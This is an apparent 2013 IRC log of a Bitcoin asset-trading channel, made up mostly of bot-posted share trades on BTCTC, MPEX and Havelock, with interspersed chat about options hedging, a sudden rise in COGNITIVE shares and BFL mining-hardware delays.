[COGNITIVE] 1 @ 0.599999 BTC [-] Jul 16 08:22:11 [BTCTC] [COGNITIVE] 5 @ 0.6 = 3 BTC [+] Jul 16 08:23:09 [BTCTC] [COGNITIVE] 4 @ 0.61475 = 2.459 BTC [+] Jul 16 08:23:10 [BTCTC] [COGNITIVE] 4 @ 0.615 = 2.46 BTC [+] Jul 16 08:26:04 https://www.youtube.com/watch?feature=player_embedded&v=PlXsxi20ymc#at=351 Jul 16 08:27:50 [BTCTC] [BASIC-MINING] 1 @ 0.49 BTC [-] Jul 16 08:27:53 [BTCTC] [BASIC-MINING] 1 @ 0.480001 BTC [-] Jul 16 08:27:55 [BTCTC] [BASIC-MINING] 2 @ 0.48 = 0.96 BTC [-] Jul 16 08:28:16 [BTCTC] [COGNITIVE] 3 @ 0.615 = 1.845 BTC [+] Jul 16 08:28:38 [BTCTC] [AMC-PT] 500 @ 0.002499 = 1.2495 BTC [-] Jul 16 08:30:41 [BTCTC] [S.MPOE-PT] 1 @ 0.00082 BTC [-] Jul 16 08:32:37 [BTCTC] [AMC-PT] 21 @ 0.002492 = 0.0523 BTC [-] Jul 16 08:33:22 [BTCTC] [COGNITIVE] 1 @ 0.561793 BTC [-] Jul 16 08:33:24 [BTCTC] [COGNITIVE] 1 @ 0.561792 BTC [-] Jul 16 08:35:17 [BTCTC] [GSDPT] 2 @ 0.002011 = 0.004 BTC [-] Jul 16 08:35:32 [BTCTC] [COGNITIVE] 1 @ 0.614 BTC [+] Jul 16 08:36:29 [BTCTC] [DMS.MINING] 1 @ 0.0156 BTC [-] Jul 16 08:36:56 [BTCTC] [COGNITIVE] 1 @ 0.561792 BTC [-] Jul 16 08:37:37 [BTCTC] [S.DICE-PT] 2 @ 0.0022 = 0.0044 BTC [-] Jul 16 08:38:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.041957 = 0.0839 BTC [+] Jul 16 08:45:06 [BTCTC] [AMC-PT] 41 @ 0.002499 = 0.1025 BTC [+] Jul 16 08:45:28 [BTCTC] [COGNITIVE] 1 @ 0.613999 BTC [+] Jul 16 08:45:30 [BTCTC] [COGNITIVE] 1 @ 0.614 BTC [+] Jul 16 08:45:31 [BTCTC] [COGNITIVE] 95 @ 0.615 = 58.425 BTC [+] Jul 16 08:47:29 [HAVELOCK] [AM100] 4 @ 0.04115 = 0.1646 BTC [-] Jul 16 08:48:31 [BTCTC] [ASICMINER-PT] 1 @ 4.292221 BTC [+] Jul 16 08:50:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.04136 = 0.0827 BTC [-] Jul 16 08:51:10 [BTCTC] [TAT.ASICMINER] 24 @ 0.041955 = 1.0069 BTC [+] Jul 16 08:51:39 [BTCTC] [TAT.ASICMINER] 7 @ 0.041955 = 0.2937 BTC [+] Jul 16 08:52:12 [BTCTC] [COGNITIVE] 4 @ 0.615 = 2.46 BTC [+] Jul 16 08:54:23 [HAVELOCK] [AM100] 2 @ 0.041604 = 0.0832 BTC [+] Jul 16 08:59:10 [BTCTC] [DMS.MINING] 20 @ 0.0156 = 0.312 BTC [-] Jul 16 08:59:12 [BTCTC] [DMS.MINING] 18 @ 0.015525 = 0.2795 BTC [-] Jul 16 08:59:14 [BTCTC] [DMS.MINING] 10 @ 0.015518 = 0.1552 BTC [-] Jul 16 08:59:51 [MPEX] [S.MPOE] 5950 @ 0.00084606 = 5.0341 BTC [+] Jul 16 09:00:54 [HAVELOCK] [AM100] 1 @ 0.041604 BTC [+] Jul 16 09:03:33 [MPEX] [S.MPOE] 3408 @ 0.00084859 = 2.892 BTC [+] Jul 16 09:09:04 [BTCTC] [TAT.VIRTUALMINE] 1142 @ 0.00434 = 4.9563 BTC [+] Jul 16 09:09:05 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00434 = 0.434 BTC [+] Jul 16 09:10:45 [BTCTC] [COGNITIVE] 5 @ 0.615 = 3.075 BTC [+] Jul 16 09:10:57 [BTCTC] [DMS.MINING] 310 @ 0.015518 = 4.8106 BTC [-] Jul 16 09:11:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.041951 BTC [-] Jul 16 09:12:35 [BTCTC] [DMS.SELLING] 91 @ 0.023239 = 2.1147 BTC [-] Jul 16 09:12:37 [BTCTC] [DMS.SELLING] 80 @ 0.02231 = 1.7848 BTC [-] Jul 16 09:12:38 [BTCTC] [DMS.SELLING] 29 @ 0.022301 = 0.6467 BTC [-] Jul 16 09:13:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.041949 = 0.0839 BTC [-] Jul 16 09:15:36 [BTCTC] [TAT.VIRTUALMINE] 759 @ 0.0043 = 3.2637 BTC [-] Jul 16 09:20:29 [MPEX] [S.MPOE] 4300 @ 0.00085514 = 3.6771 BTC [+] Jul 16 09:28:15 [BTCTC] [ASICMINER-PT] 1 @ 4.304001 BTC [+] Jul 16 09:28:38 [BTCTC] [TAT.ASICMINER] 41 @ 0.041947 = 1.7198 BTC [-] Jul 16 09:29:16 [BTCTC] [TAT.ASICMINER] 50 @ 0.041946 = 2.0973 BTC [-] Jul 16 09:30:23 [BTCTC] [AMC-PT] 1 @ 0.002499 BTC [+] Jul 16 09:30:25 [BTCTC] [TAT.ASICMINER] 15 @ 0.041979 = 0.6297 BTC [+] Jul 16 09:40:50 [BTCTC] [COGNITIVE] 4 @ 0.615 = 2.46 BTC [+] Jul 16 09:43:26 [BTCTC] [COGNITIVE] 45 @ 0.615 = 27.675 BTC [+] Jul 16 09:43:27 [BTCTC] [BASIC-MINING] 1 @ 0.495001 BTC [+] Jul 16 09:46:59 [BTCTC] [RSM] 3 @ 0.016215 = 0.0486 BTC [-] Jul 16 09:49:43 [BTCTC] [PAJKA.BOND] 4 @ 0.047 = 0.188 BTC [-] Jul 16 09:50:26 [BTCTC] [COGNITIVE] 1 @ 0.615 BTC [+] Jul 16 09:52:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.041972 = 0.0839 BTC [-] Jul 16 09:55:53 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.004459 = 0.0312 BTC [+] Jul 16 09:58:07 [BTCTC] [COGNITIVE] 1 @ 0.615 BTC [+] Jul 16 09:58:19 [BTCTC] [TAT.ASICMINER] 50 @ 0.041971 = 2.0986 BTC [-] Jul 16 09:58:33 [BTCTC] [TAT.ASICMINER] 16 @ 0.041972 = 0.6716 BTC [+] Jul 16 10:05:26 whoa max keiser...should have learned ebonics first Jul 16 10:05:40 but seems to have insufficient attn span Jul 16 10:05:52 never thought I'd see those two words together Jul 16 10:06:39 [BTCTC] [DMS.PURCHASE] 28 @ 0.040033 = 1.1209 BTC [+] **** BEGIN LOGGING AT Tue Jul 16 14:37:31 2013 Jul 16 14:38:03 mjr, did you buy s.dice? Jul 16 14:38:18 ChaangNoi!*@* added to ignore list. Jul 16 14:38:23 [BTCTC] [ASICMINER-PT] 12 @ 4.38 = 52.56 BTC [+] Jul 16 14:39:12 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [-] Jul 16 14:39:21 [BTCTC] [TAT.ASICMINER] 429 @ 0.041988 = 18.0129 BTC [+] Jul 16 14:40:26 [BTCTC] [TAT.ASICMINER] 50 @ 0.042045 = 2.1023 BTC [+] Jul 16 14:40:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.04209 = 0.0842 BTC [+] Jul 16 14:41:10 [BTCTC] [TAT.ASICMINER] 35 @ 0.042095 = 1.4733 BTC [+] Jul 16 14:42:10 [BTCTC] [TAT.ASICMINER] 12 @ 0.0421 = 0.5052 BTC [+] Jul 16 14:42:16 [BTCTC] [TAT.ASICMINER] 163 @ 0.0421 = 6.8623 BTC [+] Jul 16 14:42:51 [BTCTC] [COGNITIVE] 3 @ 0.62 = 1.86 BTC [+] Jul 16 14:45:02 ChaangNoi: not yet Jul 16 14:45:05 but i might Jul 16 14:45:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.0421 = 0.2105 BTC [+] Jul 16 14:46:07 i'm building my options writing strategy, no time for equities right now Jul 16 14:46:34 [BTCTC] [B.YABMC] 3 @ 0.0032 = 0.0096 BTC [-] Jul 16 14:46:35 [BTCTC] [AMC-PT] 100 @ 0.002493 = 0.2493 BTC [-] Jul 16 14:46:36 [BTCTC] [B.YABMC] 1 @ 0.0028 BTC [-] Jul 16 14:46:38 [BTCTC] [B.YABMC] 97 @ 0.002555 = 0.2478 BTC [-] Jul 16 14:46:40 [BTCTC] [B.YABMC] 2 @ 0.002554 = 0.0051 BTC [-] Jul 16 14:46:42 [BTCTC] [B.YABMC] 10 @ 0.002552 = 0.0255 BTC [-] Jul 16 14:46:43 mjr_ how's that coming along ? Jul 16 14:46:54 its going well mircea_popescu Jul 16 14:46:59 real liquidity Jul 16 14:47:10 handled a guy looking for 100 coins with no muss and no fuss Jul 16 14:47:21 and he may have paid a dollar over gox Jul 16 14:47:24 with no slippage Jul 16 14:47:34 he got 20 at 99, 80 at 100 Jul 16 14:47:37 no i meant your options strategy Jul 16 14:47:44 eh, still working on a few things Jul 16 14:48:00 ChaangNoi: you were asking about sdice, i am not really into equitites at the moment Jul 16 14:48:13 the one question i have is in regards to a "SPLIT" Jul 16 14:48:23 [BTCTC] [ASICMINER-PT] 1 @ 4.345 BTC [-] Jul 16 14:48:32 for 10 coins, I get 5 calls, and X puts Jul 16 14:48:45 [BTCTC] [ASICMINER-PT] 1 @ 4.3479 BTC [+] Jul 16 14:48:47 [BTCTC] [ASICMINER-PT] 7 @ 4.38 = 30.66 BTC [+] Jul 16 14:48:49 correct? Jul 16 14:48:50 yea Jul 16 14:48:58 now, the calls i have just created Jul 16 14:49:04 if i hold them to expiration Jul 16 14:49:14 i am just getting my own coin, right? Jul 16 14:49:28 yes, on mpex Jul 16 14:49:33 where else would i go for options? Jul 16 14:50:07 mjr_ well, as an underwriter you get collateral-exercise value Jul 16 14:50:12 as an options holder you get exercise value. Jul 16 14:50:27 mathematically collateral - exercise value + exercise value = collateral. Jul 16 14:50:37 basically, a "synthetic future" would be buy a call/put, sell the other type Jul 16 14:50:44 if i create a call, and a put Jul 16 14:50:46 and sell the put Jul 16 14:50:53 [BTCTC] [AMC-PT] 800 @ 0.002499 = 1.9992 BTC [+] Jul 16 14:50:56 but hold the call Jul 16 14:51:03 i should have a "synthetic future Jul 16 14:51:29 or am i missing something? Jul 16 14:52:49 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.00446 = 0.0624 BTC [+] Jul 16 14:53:21 you'd have a very close approximation, yes Jul 16 14:53:27 cool Jul 16 14:53:51 there is some basis risk with this strategy, but i plan on managing that Jul 16 14:54:02 the end goal is a delta neutral position Jul 16 14:55:25 [BTCTC] [COGNITIVE] 9 @ 0.62 = 5.58 BTC [+] Jul 16 14:55:34 so, unfortunately, my ability to show the maths is not yet caught up with my instinct that this is possible Jul 16 14:55:43 but still working on it Jul 16 14:55:54 yeah, well, possible it may well be but this is where banks are broken. Jul 16 14:55:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.0421 BTC [+] Jul 16 14:56:05 yes very true Jul 16 14:56:10 http://trilema.com/2013/why-mpex-is-better-than-fiat-institutions-part-349085-we-dont-use-excel/ Jul 16 14:56:16 Why MPEx is better than fiat institutions, part 349085 : we don’t use Excel. pe Trilema - Un blog Jul 16 14:56:20 consider that there's no usg to bail you out in btc. Jul 16 14:56:29 that is my point in hedging Jul 16 14:56:43 if i create a synthetic future on one side Jul 16 14:56:44 what i'm saying is that quants regularly fuck up the math Jul 16 14:56:51 oh, i remember that Jul 16 14:56:52 like the recent grand example o the gaussian copula. Jul 16 14:57:27 no doubt, that is why i want to do all the math myself, which means learning a bit of calculus, and pulling out the old graphing calculator lol Jul 16 14:57:52 maybe more than a bit. Jul 16 14:58:07 but, technically speaking, if i have the synthetic future on mpex, and the opposite side of a future contract somewhere else Jul 16 14:58:12 the net delta is 0 Jul 16 14:58:19 i'm long a future here, short a future there Jul 16 14:58:29 as long as you don't get whiplash. Jul 16 14:58:53 well, we are almost at the point where we actively try it out, that is when the rubber hits the road Jul 16 14:58:57 when the bitcoins are in play Jul 16 14:58:58 this is why mpex positions are fully collateralised, once you've opened it you know you can rely on it for a fixed term no matter what. Jul 16 14:59:13 make sure the other side is in the same situation and then yeah, pretty much Jul 16 14:59:21 yes, and that is what is great about that Jul 16 15:02:13 anyway, its just an idea, and we'll prove it out in practice not theory Jul 16 15:04:35 [BTCTC] [ASICMINER-PT] 1 @ 4.36 BTC [-] Jul 16 15:06:17 [MPEX] [S.MPOE] 7463 @ 0.00091517 = 6.8299 BTC [+] Jul 16 15:08:07 [BTCTC] [COGNITIVE] 5 @ 0.62 = 3.1 BTC [+] Jul 16 15:09:50 [BTCTC] [TAT.VIRTUALMINE] 107 @ 0.00432 = 0.4622 BTC [-] Jul 16 15:09:52 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004315 = 0.4315 BTC [-] Jul 16 15:09:52 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.004302 = 0.0172 BTC [-] Jul 16 15:09:54 [BTCTC] [TAT.VIRTUALMINE] 441 @ 0.0043 = 1.8963 BTC [-] Jul 16 15:09:55 [BTCTC] [TAT.VIRTUALMINE] 75 @ 0.004276 = 0.3207 BTC [-] Jul 16 15:09:56 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004275 = 0.4275 BTC [-] Jul 16 15:09:58 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0042 BTC [-] Jul 16 15:09:59 [BTCTC] [TAT.VIRTUALMINE] 136 @ 0.0042 = 0.5712 BTC [-] Jul 16 15:10:00 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00411 = 0.411 BTC [-] Jul 16 15:10:02 [BTCTC] [TAT.VIRTUALMINE] 1562 @ 0.004101 = 6.4058 BTC [-] Jul 16 15:10:03 [BTCTC] [TAT.VIRTUALMINE] 615 @ 0.0041 = 2.5215 BTC [-] Jul 16 15:10:05 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0041 BTC [-] Jul 16 15:10:05 [BTCTC] [TAT.VIRTUALMINE] 250 @ 0.00401 = 1.0025 BTC [-] Jul 16 15:10:07 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.004 = 0.056 BTC [-] Jul 16 15:10:09 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004 = 0.04 BTC [-] Jul 16 15:10:21 [BTCTC] [BASIC-MINING] 3 @ 0.599999 = 1.8 BTC [-] Jul 16 15:10:23 [BTCTC] [BASIC-MINING] 1 @ 0.6 BTC [+] Jul 16 15:10:59 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004 BTC [-] Jul 16 15:11:45 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.00446 = 0.0357 BTC [+] Jul 16 15:11:48 [BTCTC] [COGNITIVE] 23 @ 0.62 = 14.26 BTC [+] Jul 16 15:14:33 [BTCTC] [DMS.MINING] 5 @ 0.015581 = 0.0779 BTC [-] Jul 16 15:14:35 [BTCTC] [DMS.MINING] 76 @ 0.01558 = 1.1841 BTC [-] Jul 16 15:14:37 [BTCTC] [DMS.MINING] 76 @ 0.015555 = 1.1822 BTC [-] Jul 16 15:14:37 [BTCTC] [DMS.MINING] 5 @ 0.015524 = 0.0776 BTC [-] Jul 16 15:14:39 [BTCTC] [DMS.MINING] 2 @ 0.015521 = 0.031 BTC [-] Jul 16 15:14:40 [BTCTC] [DMS.MINING] 4 @ 0.01552 = 0.0621 BTC [-] Jul 16 15:14:41 [BTCTC] [DMS.MINING] 100 @ 0.015518 = 1.5518 BTC [-] Jul 16 15:14:43 [BTCTC] [DMS.MINING] 1 @ 0.015518 BTC [-] Jul 16 15:14:44 [BTCTC] [DMS.MINING] 25 @ 0.015501 = 0.3875 BTC [-] Jul 16 15:14:45 [BTCTC] [DMS.MINING] 9 @ 0.0152 = 0.1368 BTC [-] Jul 16 15:14:46 [BTCTC] [DMS.MINING] 250 @ 0.0151 = 3.775 BTC [-] Jul 16 15:14:48 [BTCTC] [DMS.MINING] 62 @ 0.015093 = 0.9358 BTC [-] Jul 16 15:14:49 [BTCTC] [DMS.MINING] 9 @ 0.015 = 0.135 BTC [-] Jul 16 15:14:50 [BTCTC] [DMS.MINING] 1 @ 0.015 BTC [-] Jul 16 15:14:50 [BTCTC] [DMS.MINING] 5 @ 0.014511 = 0.0726 BTC [-] Jul 16 15:14:52 [BTCTC] [DMS.MINING] 10 @ 0.014501 = 0.145 BTC [-] Jul 16 15:14:53 [BTCTC] [DMS.MINING] 10 @ 0.0145 = 0.145 BTC [-] Jul 16 15:14:54 [BTCTC] [DMS.MINING] 1 @ 0.0144 BTC [-] Jul 16 15:14:55 [BTCTC] [DMS.MINING] 50 @ 0.01431 = 0.7155 BTC [-] Jul 16 15:14:56 [BTCTC] [DMS.MINING] 20 @ 0.014301 = 0.286 BTC [-] Jul 16 15:14:58 [BTCTC] [DMS.MINING] 20 @ 0.0143 = 0.286 BTC [-] Jul 16 15:14:59 [BTCTC] [DMS.MINING] 5 @ 0.0143 = 0.0715 BTC [-] Jul 16 15:15:00 [BTCTC] [DMS.MINING] 9 @ 0.014201 = 0.1278 BTC [-] Jul 16 15:15:01 [BTCTC] [DMS.MINING] 11 @ 0.014153 = 0.1557 BTC [-] Jul 16 15:15:01 [BTCTC] [DMS.MINING] 10 @ 0.014153 = 0.1415 BTC [-] Jul 16 15:15:03 [BTCTC] [DMS.MINING] 10 @ 0.014153 = 0.1415 BTC [-] Jul 16 15:15:04 [BTCTC] [DMS.MINING] 1 @ 0.014151 BTC [-] Jul 16 15:15:05 [BTCTC] [DMS.MINING] 10 @ 0.014151 = 0.1415 BTC [-] Jul 16 15:15:06 [BTCTC] [DMS.MINING] 12 @ 0.014 = 0.168 BTC [-] Jul 16 15:15:53 [BTCTC] [COGNITIVE] 225 @ 0.62 = 139.5 BTC [+] Jul 16 15:16:30 [BTCTC] [COGNITIVE] 2 @ 0.62 = 1.24 BTC [+] Jul 16 15:16:42 [BTCTC] [COGNITIVE] 19 @ 0.62 = 11.78 BTC [+] Jul 16 15:19:32 [BTCTC] [COGNITIVE] 1 @ 0.62 BTC [+] Jul 16 15:20:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.042096 BTC [-] Jul 16 15:20:32 [BTCTC] [COGNITIVE] 7 @ 0.62 = 4.34 BTC [+] Jul 16 15:21:09 [HAVELOCK] [AM100] 5 @ 0.040253 = 0.2013 BTC [-] Jul 16 15:21:37 [HAVELOCK] [HIM] 2 @ 0.26420001 = 0.5284 BTC [-] Jul 16 15:23:06 [BTCTC] [COGNITIVE] 1 @ 0.62 BTC [+] Jul 16 15:24:20 [BTCTC] [PAJKA.BOND] 1 @ 0.047 BTC [-] Jul 16 15:24:23 [BTCTC] [PAJKA.BOND] 5 @ 0.047 = 0.235 BTC [-] Jul 16 15:24:25 [BTCTC] [PAJKA.BOND] 38 @ 0.045303 = 1.7215 BTC [-] Jul 16 15:24:27 [BTCTC] [PAJKA.BOND] 5 @ 0.045302 = 0.2265 BTC [-] Jul 16 15:24:29 [BTCTC] [PAJKA.BOND] 2 @ 0.0453 = 0.0906 BTC [-] Jul 16 15:24:32 [BTCTC] [PAJKA.BOND] 1 @ 0.04527 BTC [-] Jul 16 15:24:34 [BTCTC] [PAJKA.BOND] 1 @ 0.0451 BTC [-] Jul 16 15:24:35 [BTCTC] [PAJKA.BOND] 1 @ 0.04267 BTC [-] Jul 16 15:24:37 [BTCTC] [PAJKA.BOND] 1 @ 0.0424 BTC [-] Jul 16 15:24:38 [BTCTC] [PAJKA.BOND] 1 @ 0.042399 BTC [-] Jul 16 15:24:39 [BTCTC] [PAJKA.BOND] 5 @ 0.042 = 0.21 BTC [-] Jul 16 15:24:41 [BTCTC] [PAJKA.BOND] 49 @ 0.0406 = 1.9894 BTC [-] Jul 16 15:24:43 [BTCTC] [PAJKA.BOND] 10 @ 0.04 = 0.4 BTC [-] Jul 16 15:24:45 [BTCTC] [PAJKA.BOND] 40 @ 0.04 = 1.6 BTC [-] Jul 16 15:25:23 [BTCTC] [COGNITIVE] 1 @ 0.62 BTC [+] Jul 16 15:25:40 ;;seen mircea_popescu Jul 16 15:25:41 mircea_popescu was last seen in #bitcoin-assets 26 minutes and 27 seconds ago: make sure the other side is in the same situation and then yeah, pretty much Jul 16 15:25:46 [BTCTC] [COGNITIVE] 12 @ 0.62 = 7.44 BTC [+] Jul 16 15:29:12 [BTCTC] [COGNITIVE] 10 @ 0.62 = 6.2 BTC [+] Jul 16 15:31:59 [BTCTC] [COGNITIVE] 1 @ 0.7 BTC [+] Jul 16 15:32:01 [BTCTC] [COGNITIVE] 1 @ 0.749999 BTC [+] Jul 16 15:32:02 [BTCTC] [COGNITIVE] 1 @ 0.75 BTC [+] Jul 16 15:32:03 [BTCTC] [COGNITIVE] 22 @ 0.7999 = 17.5978 BTC [+] Jul 16 15:33:02 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [+] Jul 16 15:34:49 ChaangNoi: you know any channels for trading talk? Jul 16 15:34:52 non bitcoin Jul 16 15:35:32 oh, you used to trade other stuff right? Jul 16 15:35:36 [BTCTC] [S.DICE-PT] 70 @ 0.00221 = 0.1547 BTC [+] Jul 16 15:35:37 o/ ChaangNoi Jul 16 15:35:39 are there any forex channels, or so... Jul 16 15:35:42 you told me about oil Jul 16 15:35:56 oil-otc , or so? Jul 16 15:35:59 [BTCTC] [COGNITIVE] 5 @ 0.630001 = 3.15 BTC [-] Jul 16 15:36:00 [BTCTC] [COGNITIVE] 11 @ 0.63 = 6.93 BTC [-] Jul 16 15:36:04 [BTCTC] [COGNITIVE] 121 @ 0.627 = 75.867 BTC [-] Jul 16 15:36:17 What did you do to get cog so high? Jul 16 15:36:23 guess i'll randomly try some rooms (#futures, #options, #trading) Jul 16 15:36:29 and what is COGNITIVE? Jul 16 15:36:58 ah nice Jul 16 15:37:05 ooh, you recommend? Jul 16 15:37:07 Do you think I should invest? Jul 16 15:37:57 [HAVELOCK] [SDSTM] 2 @ 0.01089 = 0.0218 BTC [+] Jul 16 15:38:09 I moved my basic and am shares to cog Jul 16 15:38:24 Damn, you could all ways drop the amount and then I could buy ;) Jul 16 15:38:38 I need a shiny new pc dammit :D Jul 16 15:39:43 [HAVELOCK] [SDICE] 1 @ 0.1962 BTC [-] Jul 16 15:39:58 I see it getting to .8 and staling for a bit Jul 16 15:40:47 [BTCTC] [COGNITIVE] 1 @ 0.7999 BTC [+] Jul 16 15:40:56 nm lol Jul 16 15:41:03 hahaha Jul 16 15:41:18 ChaangNoi, you are going to absolutely bank! Jul 16 15:42:29 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [+] Jul 16 15:42:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.042096 BTC [-] Jul 16 15:42:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.042095 = 0.0842 BTC [-] Jul 16 15:43:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.042095 BTC [-] Jul 16 15:43:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.042001 BTC [-] Jul 16 15:44:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.042 = 0.126 BTC [-] Jul 16 15:44:19 money flowing out of AM into COG? Jul 16 15:44:38 Dammit ChaangNoi :( Please tell me the next time you intend to do something like this, I want to make millions \o/ Also, have you thought about BitVPS, I have like 39 shares in there and wouldn't mind to profit off of it! :P Jul 16 15:45:49 is the next step a dump? Jul 16 15:45:51 Damn! Then next time make it GMT time ;) Jul 16 15:45:58 lol Jul 16 15:46:04 ah ok Jul 16 15:46:34 are you going to continue to pump, if so I will stick 1 btc in there Jul 16 15:46:54 [BTCTC] [DMS.SELLING] 10 @ 0.02405 = 0.2405 BTC [-] Jul 16 15:46:57 [BTCTC] [DMS.MINING] 10 @ 0.0159 = 0.159 BTC [+] Jul 16 15:48:45 when the fuck did this turn into #smalltimer-nonsense anyway Jul 16 15:49:38 [BTCTC] [ASICMINER-PT] 1 @ 4.39 BTC [+] Jul 16 15:50:13 ooh, has anyone claimed that chan? Jul 16 15:50:15 [BTCTC] [TAT.ASICMINER] 13 @ 0.041701 = 0.5421 BTC [-] Jul 16 15:50:19 [BTCTC] [BFMINES] 23 @ 0.00399 = 0.0918 BTC [+] Jul 16 15:50:44 yes, got it Jul 16 15:50:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.042097 = 0.1263 BTC [+] Jul 16 15:50:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.042098 = 0.0842 BTC [+] Jul 16 15:51:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.0417 = 0.1251 BTC [-] Jul 16 15:51:29 lol Jul 16 15:51:35 feel free to join me in #smalltimer-nonsense if you like anyone Jul 16 15:51:45 we will be discussing the best investment strategy for your .2 bitcoins Jul 16 15:51:48 this is actually not such a bad idea Jul 16 15:52:08 mircea_popescu: I thought ideas were overrated! xD Jul 16 15:52:15 Vbs lol ok ok Jul 16 15:52:26 hehe Jul 16 15:52:37 why was chaang-noi kicked? Jul 16 15:52:39 [BTCTC] [TAT.ASICMINER] 13 @ 0.042097 = 0.5473 BTC [+] Jul 16 15:52:41 [BTCTC] [TAT.ASICMINER] 12 @ 0.042098 = 0.5052 BTC [+] Jul 16 15:52:43 [BTCTC] [TAT.ASICMINER] 215 @ 0.042099 = 9.0513 BTC [+] Jul 16 15:53:01 bitcoin SEC violation Jul 16 15:53:05 LOL Jul 16 15:53:21 o that's who it was. Jul 16 15:53:23 insider trading \()/ Jul 16 15:53:31 malaimo matthew_boyd Menoetius metabyte metazilla midnightmagic MiningBuddy mircea_popescu mitty mjr_ mod6 mpexbot Jul 16 15:53:35 i wasn't understanding wtf got into the matthew_boyd kid Jul 16 15:54:43 got my first visitor to #smalltimer-nonsense Jul 16 15:54:43 [BTCTC] [ASICMINER-PT] 1 @ 4.385 BTC [-] Jul 16 15:54:47 lol ok ok Jul 16 15:54:55 [BTCTC] [COGNITIVE] 1 @ 0.7999 BTC [+] Jul 16 15:55:40 [BTCTC] [AMC-PT] 50 @ 0.002499 = 0.125 BTC [+] Jul 16 15:55:57 It was short lived Jul 16 15:56:07 it was Jul 16 15:56:09 hm ? Jul 16 15:56:14 but we have fun over at #smalltimer-nonsense Jul 16 15:56:33 grass is greener there? Jul 16 15:56:47 not sure if it is greener Jul 16 15:56:59 but i am a fan of ironic names... Jul 16 15:57:39 google "chrome" a browser with no browser chrome, google "pixel" a high def display where you can't see the pixels, etc Jul 16 15:58:48 [BTCTC] [TAT.ASICMINER] 84 @ 0.042099 = 3.5363 BTC [+] Jul 16 15:58:52 [BTCTC] [TAT.ASICMINER] 26 @ 0.0421 = 1.0946 BTC [+] Jul 16 16:00:14 [BTCTC] [TAT.ASICMINER] 37 @ 0.041702 = 1.543 BTC [-] Jul 16 16:00:20 [BTCTC] [TAT.ASICMINER] 50 @ 0.041701 = 2.0851 BTC [-] Jul 16 16:00:23 [BTCTC] [TAT.ASICMINER] 24 @ 0.0417 = 1.0008 BTC [-] Jul 16 16:00:25 [BTCTC] [TAT.ASICMINER] 15 @ 0.041611 = 0.6242 BTC [-] Jul 16 16:00:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.04161 = 0.2081 BTC [-] Jul 16 16:00:40 [BTCTC] [TAT.ASICMINER] 25 @ 0.0416 = 1.04 BTC [-] Jul 16 16:01:25 [BTCTC] [ASICMINER-PT] 1 @ 4.355002 BTC [-] Jul 16 16:02:07 where did I heard that before... xD Jul 16 16:02:23 [BTCTC] [COGNITIVE] 1 @ 0.7999 BTC [+] Jul 16 16:02:25 [BTCTC] [COGNITIVE] 7 @ 0.8 = 5.6 BTC [+] Jul 16 16:03:48 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 16 16:04:32 [BTCTC] [ASICMINER-PT] 1 @ 4.365001 BTC [-] Jul 16 16:05:18 [BTCTC] [COGNITIVE] 5 @ 0.8 = 4 BTC [+] Jul 16 16:06:27 [BTCTC] [COGNITIVE] 58 @ 0.8 = 46.4 BTC [+] Jul 16 16:07:02 [BTCTC] [COGNITIVE] 4 @ 0.85 = 3.4 BTC [+] Jul 16 16:07:41 here goes the pump Jul 16 16:08:13 "Our hashrate at the end of the week: 153 gh/s" Jul 16 16:08:20 "Our hashrate after the BFL units are delivered (soon): 573 gh/s" Jul 16 16:08:32 ffs, I just want my singles Jul 16 16:08:32 I really like the "soon" part Jul 16 16:08:53 Everyday I see the investment in those damn things dwindle more and more Jul 16 16:09:21 BFL is still shipping "Day 1" orders of those Jul 16 16:09:23 I find it must easier to deal with, if I just dont go to BFL's website lol Jul 16 16:09:28 Day ONE!!!! :P Jul 16 16:09:36 Yeah I know :P Jul 16 16:09:47 Mine is from April Jul 16 16:09:55 The day after the damn price change Jul 16 16:10:04 That one hurt Jul 16 16:10:51 Maybe they are shipping one day per year Jul 16 16:11:32 lmao, can coinbr be a sponsor of #smalltimer-nonsense? Jul 16 16:11:34 Beer helps too Jul 16 16:11:47 hmmmm... but then i need to figure some limited accounts without 0.09 monthly fee Jul 16 16:11:52 [BTCTC] [ASICMINER-PT] 1 @ 4.399 BTC [+] Jul 16 16:11:54 [BTCTC] [ASICMINER-PT] 1 @ 4.418 BTC [+] Jul 16 16:11:56 [BTCTC] [ASICMINER-PT] 1 @ 4.448999 BTC [+] Jul 16 16:11:57 [BTCTC] [ASICMINER-PT] 1 @ 4.449 BTC [+] Jul 16 16:11:59 [BTCTC] [ASICMINER-PT] 3 @ 4.45 = 13.35 BTC [+] Jul 16 16:12:03 lol Jul 16 16:13:03 I have invested 0.001 btc in your company and my opinion counts! Jul 16 16:13:11 but i did have some dude who made 0.5BTC into 2 over a month using mpoe options :D Jul 16 16:13:27 thank god you were here today mjr_ xD 